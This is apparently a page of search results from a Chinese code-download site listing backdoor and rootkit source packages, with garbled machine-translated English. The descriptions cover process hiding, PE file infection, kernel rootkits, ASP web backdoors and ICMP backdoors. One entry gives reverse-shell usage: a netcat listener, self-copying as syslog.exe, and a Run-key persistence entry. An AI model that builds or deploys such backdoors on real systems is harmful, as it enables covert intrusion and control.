Location:
Search - back Door
Search list
Description: 让进程在系统中更加隐蔽(2) 一般来说一个后门程序需要更改系统的某些文件来让程序在系统启动执行这个程序, 又要在某个地方保留这个程序(一般是在硬盘)。如果有什么办法不这样做又让程序在 系统中运行的话,就可以使后门程序更加隐蔽。也就是说程序在硬盘上找不到在系统的 启动配置中没有这有项。真正要做到这样好象不太现实,但可以采用简单的方法:在程 序被执行后删除程序文件和启动文件中被更改的部分,然后在系统被关闭前保留程序文 件和更改启动文件,让它在系统启动时又能被执行。 程序是一个可执行文件在被执行时系统会把它保护起来,如果要删除它需要更改系 统!很麻烦!可以把代码放到其他程序中作为另外进程的线程来运行既利用创建远程线程 函数。系统被关闭一般有三种情况:正常关机,掉电(不正常关机),一键关机(按下power). 对于正常关机,程序会收到CTRL_SHUTDOWN_EVENT的信号,一键关机,可以简单的使用钩子 但掉电(不正常关机)老农实在想不出办法。好在一般的nt服务器很少这种情况。 在nt系统下用CreateService来注册一个服务,当然是在系统SHUTDOWN前。在启动时 用DeleteService删除这个服务,保存一个程序文件在虚拟内存中,删除在硬盘上程序-process in the system to allow a more subtle (2) In general a backdoor procedures need to change the system to certain documents procedures for the system to initiate the implementation of this procedure, but also to retain a place in the process (usually in a hard disk). If there is any way to do so without letting procedures in the system running, then we can process more subtle back door. In other words procedures not found in the hard disks on the system's configuration did not start with this item. Really want to do so it did not seem realistic, but it is a simple approach : in the process would be implemented to delete files and startup files were altered, Then the system was closed down before the document retention procedures and changes in startup files, it started when the sy
Platform: |
Size: 75506 |
Author: 无间刀 |
Hits:
Description: PE可执行文件的镶入式程序的编写方法及示例(镶入式后门程序&原程序) 由于Microsoft公司的Windows系统是当前大部分个人电脑所使用的操作系统 主要包括win95,98,me,nt4,2000,xp等,而这些系统所使用的可执行文件的格式基 本上是PE结构的。这里的可执行文件的镶入式程序就是针对PE结构的可执行文件。 这里先简单说一下PE文件框架结构: DOS MZ header DOS stub//在不支持 PE文件格式的操作系统中它将简单显示一个错误提示 PE header//含了许多PE装载器用到的重要信息 Section table//每个Section的信息 Section 1 Section 2 Section 3.... 由于SectionAlignment 块对齐的原因每个Section之间都会产生很多空间, 镶入式程序的代码可以放在Section之间的空位上,比较方便的方法是把代码放在 最后一个Section的末尾,然后更改Misc.VirtualSize和SizeOfRawData这两个位 于Section table的IMAGE_SECTION_HEADER结构数组的成员。如果代码十分的长, 有时候会造成镶入的代码无法被完全加载而产生错误,这时需要更改SizeOfImage 在IMAGE_NT_HEADERS 结构中。 在不同的WINDOWS版本中api调用地址也有不同,为了解决这个问题可以更改引 入表让加载器-PE executable files embedded into the formal process of the preparation methods and examples (Insert-in procedures for the back door
Platform: |
Size: 79185 |
Author: 无间刀 |
Hits:
Description: 一个很好的内核级后门的源代码,对系统内核的操作很值得学习-a good kernel-level source code back door of the operating system kernel is worth learning.
Platform: |
Size: 132476 |
Author: 王学家 |
Hits:
Description: 一个强大的后门工具,你有用过吗?没有用过的话就赶快试试哦!- A formidable back door tool, you have been useful? Not the
useful speech quickly has tried oh!
Platform: |
Size: 54501 |
Author: 吴大章 |
Hits:
Description: Hacker Defender 1.0.0
内核级后门软件,用户可以通过本软件隐藏文件、进程、系统服务、系统驱动、注册表键的键和键值、打开的端口以及虚构可用磁盘空间。程序同时也在内存中伪装它所做的改动,并且隐身地控制被隐藏进程。程序安装隐藏后门,注册隐藏系统服务并且安装系统驱动。该后门技术允许植入Redirector。鉴于参数过多,不推荐新手使用。-Hacker Defender 1.0.0 kernel-level backdoor software, users of the software can be hidden files, processes, systems and services, the system drive, registry keys and the keys keys, open ports and fictitious available disk space. Programs are also memory camouflage it changes made to the stealth and hidden control process. Installation hidden back door, registered hidden and system services to install the system drive. The backdoor allows implantation Redirector. Given the parameters too much, do not recommend the use of newcomers.
Platform: |
Size: 92628 |
Author: 苹果 |
Hits:
Description: ASP后门,可直接删除、查看虚拟目录中的文件-ASP back door, can be directly deleted View virtual directory of documents
Platform: |
Size: 6209 |
Author: 韩毅 |
Hits:
Description: ASP后门,可直接删除、查看虚拟目录中的文件-ASP back door, can be directly deleted View virtual directory of documents
Platform: |
Size: 6144 |
Author: 韩毅 |
Hits:
Description: c编写的一个病毒,back door-c prepared by a virus, back door
Platform: |
Size: 1024 |
Author: 王勇 |
Hits:
Description: 一个很好玩的远程控制后门。可以编制服务瑞-a very fun back door remote control. Rui services can be compiled
Platform: |
Size: 4096 |
Author: 潘来安 |
Hits:
Description: 简介:
在WEB的渗透测试中,我们经常会遇到主机端口被过滤的情况,虽然成功创建后门,但是连接不上,这时,这个反弹式后门也许能起上点作用.
用法:
1. 在本地机器监听一个端口:
netcat -vv -l -p 80
2. 通过webShell或是别的什么运行后门:
binder2 80 youIPadd
3. 本地监听端口将截获一个来自远程主机的cmd.
注意:
程序本身会创建一个自启动方法, 如果没有参数的命令,会连接默认IP和默认端口,这个exe默认的IP地址是内网地址10.24.9.100,端口7358.
程序会复制自身到c:\winnt\下名为syslog.exe,并在
HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Run 下创建启动键. 如果需要卸载,请使用 binder2 /kill 命令.(如果因权限问题,这些将不能执行,比如在wenshell中执行时.)
压缩包中含源码,建议按需更改代码后使用.-Profile : WEB penetration testing, we will always be the host ports are filtered, although the successful creation of a back door, but do not connect, then, the rebound in the back door-may be able to play on the point role. Usage : 1. The local machine monitoring a port : Netcat- vv-l-p 80 2. webShell or through any other running back door : binder2 80 youIPadd 3. listening to the local port intercepted from a remote host cmd. note : The process itself will create a self-starting method, in the absence of an order parameter, will connect the default IP and default port, the default exe is the IP address within the network address 10.24.9.100, port 7358. procedures will copy itself to C : \ winnt \ named syslog.exe and HKEY_CURRENT_USER \ \ Software \ \ Microsoft \ \ Windows \ \ CurrentVe
Platform: |
Size: 12288 |
Author: 张军 |
Hits:
Description: 内核级后门软件,用户可以通过本软件隐藏文件、进程、系统服务、系统驱动、注册表键的键和键值、打开的端口以及虚构可用磁盘空间。程序同时也在内存中伪装它所做的改动,并且隐身地控制被隐藏进程。程序安装隐藏后门,注册隐藏系统服务并且安装系统驱动。-backdoor kernel-level software, users of the software can be hidden files, processes, systems and services, the system drive, registry keys and the keys keys, open ports and fictitious available disk space. Programs are also memory camouflage it changes made to the stealth and hidden control process. Installation hidden back door, registered hidden and system services to install the system drive.
Platform: |
Size: 92160 |
Author: 袁 |
Hits:
Description: 传奇世界引擎.AFT倒闭后流出的源码.经修改,去掉后门命令-Legends of the World Engine. AFT outflow after the closure of the source., As amended, to remove the back door command
Platform: |
Size: 1582080 |
Author: pc8288 |
Hits:
Description: 一个简单的正向后门模型,初学者可以以这个为样本学习,或者自己重新改造-Being a simple back door model, beginners can use this as a sample study, or to reinvent themselves
Platform: |
Size: 6144 |
Author: 黄山 |
Hits:
Description: 现在普通的后门已经满足不了要求,本程序通过C++实现反向连接后门-Now the general has been unable to meet the requirements of the back door, the procedure of C++ implementation reverse connection back door
Platform: |
Size: 2371584 |
Author: 刘文文 |
Hits:
Description: 一般的后门都是面向连接的(基于TCP),容易被发现,而ICMP后门代码是基于UDP的,是面向非连接的,不容易被发现,本程序通过C++实现ICMP后门-The back door is the general connection-oriented (based on TCP), easily found the back door and the ICMP Code is based on the UDP is not connection oriented, it is not easy to be found, the procedure of C++ implementation ICMP backdoor
Platform: |
Size: 3550208 |
Author: 刘文文 |
Hits:
Description: ICMP无端口后门程序,利用ICMP协议,实现远程后台控制,例如进程控制等。-icmp back door with no port
Platform: |
Size: 13312 |
Author: rune_x |
Hits:
Description: C语言黑客编程[4] -双管道主动连接型后门的编写-C programming language hacker [4] - double pipe active connection type of write back door
Platform: |
Size: 13625344 |
Author: Steven |
Hits:
Description: C语言黑客编程[5] -单管道主动连接型后门的编写-C programming language hacker [5] - single-pipe connection type active write back door
Platform: |
Size: 8481792 |
Author: Steven |
Hits:
Description: C语言黑客编程[6] -零管道主动连接型后门的编写-C programming language hacker [6] - zero pipeline active connection type of write back door
Platform: |
Size: 5020672 |
Author: Steven |
Hits:
Description: ghost1.0狼的,稳定的版本,没有后门,正常编译(Ghost1.0 revision of the wolf, stable, no back door, normal compilation)
Platform: |
Size: 11300864 |
Author: 小白爱吃饭
|
Hits:
« 12
3
4
5
6
7
8
9
10
...
18
»